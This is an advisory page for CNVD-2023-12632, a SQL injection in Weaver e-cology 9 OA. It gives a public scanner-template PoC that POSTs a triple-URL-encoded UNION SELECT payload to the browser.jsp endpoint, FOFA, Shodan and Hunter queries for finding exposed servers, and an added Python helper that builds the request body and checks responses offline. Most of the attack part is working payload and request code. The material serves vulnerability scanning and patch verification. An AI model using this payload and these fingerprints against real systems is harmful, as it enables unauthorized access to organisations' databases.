CNVD-2023-12632: 泛微 (Weaver) OA e-cology v9 SQL injection

Date: 2025-09-01 | Affected software: 泛微 OA e-cology | PoC: public

Vulnerability description

泛微 e-cology 9 does not validate data submitted through the front-end interface, so a crafted request can trigger a SQL injection and read sensitive data. The PoC below sends the payload `a' union select 1,''+(SELECT @@VERSION)+'` in the `keyword` parameter, URL-encoded three times with every byte percent-encoded (the shorthand in the original note is hex(hex(hex(...)))); the `''+(...)+'` concatenation and `@@VERSION` are T-SQL idioms, so the banner the rule looks for is the one a SQL Server backend returns.

Fingerprints for locating exposed instances:
fofa-query: app="泛微-协同商务系统"
shodan-query: 'ecology_JSessionid'
Hunter: title=="泛微-协同软件的精英团队,我们的目标:造就协同软件第一品牌!"

PoC code [public]

id: CNVD-2023-12632

info:
  name: 泛微 (Weaver) OA e-cology v9 SQL injection
  author: zan8in
  severity: high
  verified: true
  description: |
    泛微 e-cology 9 does not validate data submitted through the front-end interface, so a crafted request can trigger a SQL injection and read sensitive data.
    fofa-query: app="泛微-协同商务系统"
    shodan-query: 'ecology_JSessionid'
    Hunter: title=="泛微-协同软件的精英团队,我们的目标:造就协同软件第一品牌!"
    keyword payload, URL-encoded three times (hex(hex(hex(...)))): a' union select 1,''+(SELECT @@VERSION)+'
  affected: 泛微e-cology V9 < 10.56
  solutions: https://www.weaver.com.cn/cs/securityDownload.asp#
  reference:
    - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
    - https://blog.csdn.net/qq_50854662/article/details/129992329
  tags: cnvd,cnvd2023,ecology,sqli

rules:
  r0:
    request:
      method: POST
      path: /mobile/%20/plugin/browser.jsp
      body: isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"autoCount"') && 
      response.body.bcontains(b'"autoGet"') &&
      response.body.bcontains(b'"baseSql"') &&
      (response.body.ibcontains(b'Microsoft SQL Server') || response.body.ibcontains(b'MySQL') || response.body.ibcontains(b'Oracle'))
expression: r0()
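The following Python is an added example, not the PoC author's code and not anything shipped by Weaver. It reproduces the two mechanical parts of rule r0 above: the keyword encoding the description calls hex(hex(hex(...))), which is the payload `a' union select 1,''+(SELECT @@VERSION)+'` percent-encoded three times with every byte encoded in lowercase hex, and the response expression that decides a hit. It builds the request body offline and evaluates constructed sample responses; the JSON bodies behind `HIT` and `MISS` are made up for illustration, and nothing is sent over the network.

```python
"""CNVD-2023-12632 helpers: build the triple-URL-encoded keyword the PoC
sends and evaluate a response the way rule r0's expression does.
Added example; not the PoC author's code."""
from urllib.parse import unquote

# The injected keyword before encoding, recovered by decoding the PoC body.
PAYLOAD = "a' union select 1,''+(SELECT @@VERSION)+'"

# Request shape taken from rule r0 above.
PATH = "/mobile/%20/plugin/browser.jsp"
FIXED_PARAMS = "isDis=1&browserTypeId=269"


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte (alphanumerics included) in lowercase hex,
    which is what each layer of the PoC body uses."""
    return "".join("%%%02x" % b for b in s.encode("ascii"))


def triple_encode(s: str) -> str:
    """Apply percent_encode_all three times: the advisory's hex(hex(hex(...)))."""
    for _ in range(3):
        s = percent_encode_all(s)
    return s


def triple_decode(s: str) -> str:
    """Undo triple_encode; unquote() decodes every %XX, letters included."""
    for _ in range(3):
        s = unquote(s)
    return s


def build_body(payload: str = PAYLOAD) -> str:
    """POST body for rule r0 with the given payload in the keyword parameter."""
    return f"{FIXED_PARAMS}&keyword={triple_encode(payload)}"


def response_matches(status: int, body: bytes) -> bool:
    """Same logic as r0's expression: HTTP 200, the three JSON keys the
    browser.jsp endpoint emits, and a DBMS banner matched case-insensitively."""
    if status != 200:
        return False
    if any(key not in body for key in (b'"autoCount"', b'"autoGet"', b'"baseSql"')):
        return False
    lowered = body.lower()
    return any(db in lowered for db in (b"microsoft sql server", b"mysql", b"oracle"))


# Constructed sample responses (not captured from a real target).
HIT = (200, b'{"autoCount":"1","autoGet":"1","baseSql":"select ...",'
            b'"datas":[{"id":"1","name":"Microsoft SQL Server 2012 (SP4)"}]}')
MISS = (200, b'{"autoCount":"1","autoGet":"1","baseSql":"select ...","datas":[]}')

if __name__ == "__main__":
    body = build_body()
    print(f"POST {PATH}")
    print(body[:81] + "...")
    assert triple_decode(body.split("keyword=", 1)[1]) == PAYLOAD
    print("hit:", response_matches(*HIT), "miss:", response_matches(*MISS))
```

`MISS` shows why the expression needs more than the three JSON keys: the endpoint returns that structure for any keyword, and only the echoed `@@VERSION` banner inside the result set proves the injected SELECT ran. Because the payload relies on `+` string concatenation and `@@VERSION`, the banner is produced on SQL Server; on Oracle, which has neither, this particular payload cannot satisfy the `Oracle` branch of the expression even though the rule accepts it.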
